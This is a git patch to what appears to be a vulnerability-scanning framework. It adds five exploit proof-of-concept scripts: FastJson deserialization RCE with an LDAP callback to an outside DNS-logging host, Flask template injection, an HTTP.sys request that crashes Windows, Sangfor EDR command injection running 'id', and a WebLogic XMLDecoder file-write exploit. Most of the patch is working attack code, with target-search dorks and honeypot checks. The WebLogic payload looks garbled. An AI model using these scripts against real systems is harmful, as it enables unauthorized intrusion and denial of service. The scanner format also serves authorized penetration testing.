From 53a7640bd80549412879e3f99ad9d7aa7b07cdfa Mon Sep 17 00:00:00 2001 From: openx-org Date: Fri, 25 Mar 2022 18:08:13 +0800 Subject: [PATCH] 2.23.9 --- README.md | 7 +- poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py | 87 ++++++++++++++ poc/Flask_Ssti_CVE-2017-12636/poc.py | 59 ++++++++++ poc/MicroSoftRCE_CVE_2022_21907/poc.py | 109 ++++++++++++++++++ poc/SANGFOR_深信服RCE_2020_EDR/poc.py | 72 ++++++++++++ poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py | 85 ++++++++++++++ 6 files changed, 418 insertions(+), 1 deletion(-) create mode 100644 poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py create mode 100644 poc/Flask_Ssti_CVE-2017-12636/poc.py create mode 100644 poc/MicroSoftRCE_CVE_2022_21907/poc.py create mode 100644 poc/SANGFOR_深信服RCE_2020_EDR/poc.py create mode 100644 poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py diff --git a/README.md b/README.md index c55a91f..51f7d2f 100644 --- a/README.md +++ b/README.md @@ -3,7 +3,7 @@ [![Python 3.x](https://img.shields.io/badge/python-3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv3-brown.svg)](https://github.com/openx-org/BLEN/blob/main/LICENSE) -[![POC_NUM](https://img.shields.io/badge/poc_num-157-orange.svg)](#PocSupport) +[![POC_NUM](https://img.shields.io/badge/poc_num-162-orange.svg)](#PocSupport) ![GitHub Repo stars](https://img.shields.io/github/stars/openx-org/BLEN?color=gree) ![GitHub forks](https://img.shields.io/github/forks/openx-org/BLEN?color=blue) @@ -179,6 +179,9 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx |Apache Solr|Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)|``poc/Apache_Solr/CVE_2019_17558/poc.py``| ||Apache Solr 任意文件读取漏洞|``poc/Apache_Solr/File_Read/poc.py``| ||Apache Solr 远程命令执行 Log4j|``poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/poc.py``| +|Alibaba_FastJson|Alibaba_FastJsonRCE_CVE_2017_18349|``poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py``| +|MicroSoft|MicroSoftRCE_CVE_2022_2190|``poc\MicroSoftRCE_CVE_2022_21907\poc.py``| +|Sangfor 深信服|深信服EDR终端检测响应平台RCE漏洞(CNVD-2020-46552)|``poc/SANGFOR_深信服/RCE_2020_EDR/poc.py``| |碧海威 L7|碧海威 L7 弱口令漏洞|``poc/Bithighway_碧海威/Weak_Pass_L7/poc.py``| |BSPHP|BSPHP 未授权访问 信息泄露漏洞|``poc/BSPHP/Info_Disclosure/poc.py``| |C-Lodop|C-Lodop 云打印机系统平台任意文件读取漏洞|``poc/C_Lodop/File_Read/poc.py``| @@ -317,6 +320,8 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ||RCE_CVE-2018-3191|``poc/Weblogic/RCE_CVE_2018_3191/poc.py``| ||Weblogic SSRF (CVE-2014-4210)|``poc/Weblogic/SSRF_CVE_2014_4210/poc.py``| ||Weblogic 管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)|``poc/Weblogic/UnAuth_RCE_CVE_2020_14882/poc.py``| +||Weblogic XMLDecoder反序列化漏洞(CVE-2017-3506)|``poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py``| +|Flask_Ssti|Flask_Ssti_CVE-2017-12636|``poc\Flask_Ssti_CVE-2017-12636\poc.py``| |用友NC|用友NC6.5 BeanShell RCE|``poc/Yonyou_用友NC/RCE_BeanShell_CNVD_2021_30167/poc.py``| ||用友ERP-NC 目录遍历漏洞|``poc/Yonyou_用友NC/Dir_List_ERP/poc.py``| ||用友GRP-U8行政事业财务管理软件 SQL注入 CNNVD-201610-923|``poc/Yonyou_用友NC/Sqli_CNNVD_201610_923/poc.py``| diff --git a/poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py b/poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py new file mode 100644 index 0000000..a608be5 --- /dev/null +++ b/poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py @@ -0,0 +1,87 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua,get_ceye_dns,verify_ceye_dns +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2021-06-09", # POC创建时间 + "UpdateDate" : "2021-06-09", # POC创建时间 + "PocDesc" : """ + 组件类的漏洞并不适合直接拿到BLEN里批量扫,失败是可以预见的事情,笔者建议的是在渗透过程中将可疑的url拿来测试 + """, # POC描述,写更新描述,没有就不写 + + "name" : "Fastjson 反序列化远程代码执行漏洞(CVE-2017-18349)", # 漏洞名称 + "VulnID" : "CVE-2017-18349", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "Fastjson", # 漏洞应用名称 + "AppVersion" : "Fastjson <= 1.2.24", # 漏洞应用版本 + "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + Fastjson中的parseObject允许远程攻击者通过精心制作的JSON请求执行任意代码 + """, # 漏洞简要描述 + + "fofa-dork":""" + app="Fastjson" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + def _verify(self): + """ + 返回vuln + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "" # url自己按需调整 + + success,dns_flag = get_ceye_dns() + if success == False: + return [False,dns_flag] + + data = ''' + { + "b": { + "@type": "com.sun.rowset.JdbcRowSetImpl", + "dataSourceName": "ldap://%s/", + "autoCommit": true + } + } + ''' % (dns_flag) + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + # "Content-Type": "application/json", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + + flager = verify_ceye_dns(dns_flag) + if flager == True: + vuln = [True,dns_flag] + elif flager == False: + vuln = [False,dns_flag] + else: + vuln = [False,flager] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() \ No newline at end of file diff --git a/poc/Flask_Ssti_CVE-2017-12636/poc.py b/poc/Flask_Ssti_CVE-2017-12636/poc.py new file mode 100644 index 0000000..308d66a --- /dev/null +++ b/poc/Flask_Ssti_CVE-2017-12636/poc.py @@ -0,0 +1,59 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +# ... +import urllib3 +urllib3.disable_warnings() +_info = { + "author" : "", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2021-06-09", # POC创建时间 + "UpdateDate" : "2021-06-09", # POC创建时间 + "PocDesc" : """ + 该POC不具备使用价值,请忽略 + """, # POC描述,写更新描述,没有就不写 + + "name" : "Flask 模板注入", # 漏洞名称 + "AppName" : "Flask", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + + """, # 漏洞简要描述 + + "fofa-dork":"", # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + + "timeout" : 10, # 超时设定 +} + +def verify(host,proxy): + """ + 返回vuln + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = url_handle(host) + "/?name={{233*233}}" # url自己按需调整 + + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + # "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers , proxies = proxy ,timeout = self.timeout,verify = False) + if req.status_code == 200 and "54289" in req.text: + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + return vuln \ No newline at end of file diff --git a/poc/MicroSoftRCE_CVE_2022_21907/poc.py b/poc/MicroSoftRCE_CVE_2022_21907/poc.py new file mode 100644 index 0000000..446b9b2 --- /dev/null +++ b/poc/MicroSoftRCE_CVE_2022_21907/poc.py @@ -0,0 +1,109 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +import time +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "hansi", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-01-01", # POC创建时间 + "UpdateDate" : "2022-01-01", # POC创建时间 + "PocDesc" : """ + 本POC只可实现蓝屏 + """, # POC描述,写更新描述,没有就不写 + + "name" : "Windows HTTP协议栈远程代码执行漏洞(CVE-2022-21907)", # 漏洞名称 + "VulnID" : "CVE-2022-21907", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : """ + Windows Server 2019 (Server Core installation) + Windows Server 2019 + Windows 10 Version 21H2 for ARM64-based Systems + Windows 10 Version 21H2 for 32-bit Systems + Windows 11 for ARM64-based Systems + Windows 11 for x64-based Systems + Windows Server, version 20H2 (Server Core Installation) + Windows 10 Version 20H2 for ARM64-based Systems + Windows 10 Version 20H2 for 32-bit Systems + Windows 10 Version 20H2 for x64-based Systems + Windows Server 2022 (Server Core installation) + Windows Server 2022 + Windows 10 Version 21H1 for 32-bit Systems + Windows 10 Version 21H1 for ARM64-based Systems + Windows 10 Version 21H1 for x64-based Systems + Windows 10 Version 21H2 for x64-based Systems + Windows 10 Version 1809 for ARM64-based Systems + Windows 10 Version 1809 for x64-based Systems + Windows 10 Version 1809 for 32-bit Systems + """, # 漏洞应用版本 + "VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + Microsoft Windows HTTP 协议栈(HTTP.sys)存在远程代码执行漏洞,未经身份认证的远程攻击者可通过向目标 Web 服务器发送特制的HTTP请求来利用此漏洞, + 从而在目标系统上执行任意代码。利用此漏洞不需要身份认证和用户交互,微软官方将其标记为蠕虫漏洞,微软建议优先修补受此漏洞影响的服务器。 + + 此漏洞影响启用了HTTP Trailer Support的系统,默认情况下,Windows Server 2019 和 Windows 10 版本 1809不易受到攻击。 + """, # 漏洞简要描述 + + "fofa-dork":""" + + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + def _verify(self): + """ + 返回vuln + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + # "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + if req.status_code == 200 : + poc_headers = { + 'Accept-Encoding': 'AAAAAAAAAAAAAAAAAAAAAAAA, ' + 'BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S, ' + 'RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF, ' + 'TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP, ' + 'OOOAOAOOOAOOAOOOAOOOAOOOAOO, ' + '****************************stupiD, *, ,' + } + try: + req = requests.get(url,headers = poc_headers , proxies = self.proxy ,timeout = 5,verify = False) + except requests.exceptions.ReadTimeout as e: + try: + time.sleep(10) + req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + except requests.exceptions.ConnectionError as e: + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() \ No newline at end of file diff --git a/poc/SANGFOR_深信服RCE_2020_EDR/poc.py b/poc/SANGFOR_深信服RCE_2020_EDR/poc.py new file mode 100644 index 0000000..14d33ec --- /dev/null +++ b/poc/SANGFOR_深信服RCE_2020_EDR/poc.py @@ -0,0 +1,72 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +import re +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : " ", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-01-01", # POC创建时间 + "UpdateDate" : "2022-01-01", # POC创建时间 + "PocDesc" : """ + 略 + """, # POC描述,写更新描述,没有就不写 + + "name" : "深信服EDR终端检测响应平台RCE漏洞(CNVD-2020-46552)", # 漏洞名称 + "VulnID" : "CNVD-2020-46552", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + 终端检测响应平台(EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。 + """, # 漏洞简要描述 + + "fofa-dork":""" + + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + def _verify(self): + """ + 返回vuln + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/tool/log/c.php?strip_slashes=system&host=id" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + # "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + result = re.search("uid=\d+\(.+\) gid=\d+\(.+\) groups=\d+\(.+\)",req.text.strip()) + if result:#req.status_code == 200 and : + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() \ No newline at end of file diff --git a/poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py b/poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py new file mode 100644 index 0000000..48193e7 --- /dev/null +++ b/poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py @@ -0,0 +1,85 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua,random_str +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2021-06-09", # POC创建时间 + "UpdateDate" : "2021-06-09", # POC创建时间 + "PocDesc" : """ + 略 + """, # POC描述,写更新描述,没有就不写 + + "name" : "Weblogic XMLDecoder反序列化漏洞(CVE-2017-3506)", # 漏洞名称 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "", # 漏洞应用名称 + "AppVersion" : """ + Oracle WebLogic Server10.3.6.0.0 + Oracle WebLogic Server12.1.3.0.0 + Oracle WebLogic Server12.2.1.1.0 + Oracle WebLogic Server12.2.1.2.0 + """, # 漏洞应用版本 + "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + 2017年4月17日,国家信息安全漏洞共享平台(CNVD)公开了Weblogic反序列化远程代码执行漏洞(CNVD-C-2019-48814)。 + 由于在反序列化处理输入信息的过程中存在缺陷, + 未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,利用该漏洞获取服务器权限,实现远程代码执行。 + """, # 漏洞简要描述 + + "fofa-dork":""" + + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + def _verify(self): + """ + 返回vuln + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url0 = self.target + "/wls-wsat/CoordinatorPortType" # url自己按需调整 + str_flag = random_str() + filename_flag = random_str() + ".log" + data0 = ' servers/AdminSer' \ + 'ver/tmp/_WL_internal/wls-wsat/54p17w/war/{REWEBSHELL}{StrFlag}'.format(REWEBSHELL=filename_flag,StrFlag = str_flag) + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Content-Type": "text/xml", + } + url1 = self.target + "/wls-wsat/" + filename_flag + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req0 = requests.post(url0,data=data0,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + req1 = requests.get(url1,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + if str_flag in req1.text:#req.status_code == 200 and : + vuln = [True,req1.text] + else: + vuln = [False,req1.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() \ No newline at end of file